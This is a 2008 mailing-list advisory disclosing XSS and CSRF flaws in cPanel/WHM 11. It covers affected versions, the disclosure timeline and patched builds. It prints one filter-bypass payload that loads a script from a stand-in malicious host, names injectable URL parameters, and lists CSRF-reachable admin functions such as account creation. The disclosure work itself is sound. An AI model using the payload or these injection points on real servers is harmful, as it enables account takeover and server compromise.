mailing list archives
XSS and CSRF vulnerability on Cpanel 11
From: Matteo Carli <matteo () matteocarli com>
Date: Fri, 09 May 2008 02:03:26 +0200
1. DESCRIPTION OF THE SOFTWARE
cPanel is a hosting automation tool.
WHM interface provides access to the heart of the cPanel and WHM package
and allows a Server Administrator to simply configure a few options and
be on their way to hosting web sites.
2. DESCRIPTION OF THE VULNERABILITY
There are XSS (identified by CVE-2008-2070) and CSRF (identified by
CVE-2008-2071) vulnerabilities on cPanel software.
On WHM there is a simple pattern for XSS defense, but this function
is not well implemented so it's possible to bypass it using a simple
cheat. This is a simple proof of concept:
>><<<<<<<<<<<<script src="http://malicious.site/code.js" a=>>>>>>>><
In this way the function don't sanitize the string so it's possible
WHM provide, to the administrator or reseller, all function for manage
the server via Web interface but don't protect them against Cross
Request Forgery (CSRF).
To exploit this vulnerability is not necessary to inject any kind of
code to the victim.
XSS and CSRF flaw is more simple to exploit with cPanel XMLAPI 
that use Authentication Basic of WHM (This API works on the same domain
and port of WHM).
The XSS flaws are present in any function that manages user input.
An example list of vulnerable functions to XSS are:
* Knowlege Base (/scripts2/knowlegebase?issue=[INJECTION]&domain=)
* Change Ip to domain (/scripts2/changeip?domain=any&user=[INJECTION])
* List user account
The list above is not complete. It's possible there are other scripts
The CSRF flaw is in all functions that allow to perfom an action (like
restart of a service or the entire server) with HTTP method.
This vulnerability was tested on WHM 11.15.0 - cPanel 11.18.3-R21703.
The XSS can be used for create/modify accounts or retrieve important
informations about them.
With CSRF flaws an attacker can create a new user and gain reseller
privilege to it, restart a service, suspend an account, change the
password of an account and many other really intersting things.
See, for example, "createacct"  and "setupreseller"  function of
cPanel XML API.
Vendor released a new version where the XSS flaw is resolved and CSRF
mitigated enough to consider it trivial.
Update the cPanel to latest release of yours build.
All 11.18.4+ and 11.22.3+ builds include the patch. 
Note that anti-CSRF function use HTTP "Referer" header, please keep in
mind is not difficult for an attacker to modify it in various way.
6. TIME LINE
23/03/2008 - Vulnerability discovered
07/04/2008 - cPanel security team contacted
25/04/2008 - cPanel insert patch in all public builds
7. CVE REFERENCE
CVE-2008-2070 - XSS
CVE-2008-2071 - CSRF
- XSS and CSRF vulnerability on Cpanel 11 Matteo Carli (May 09)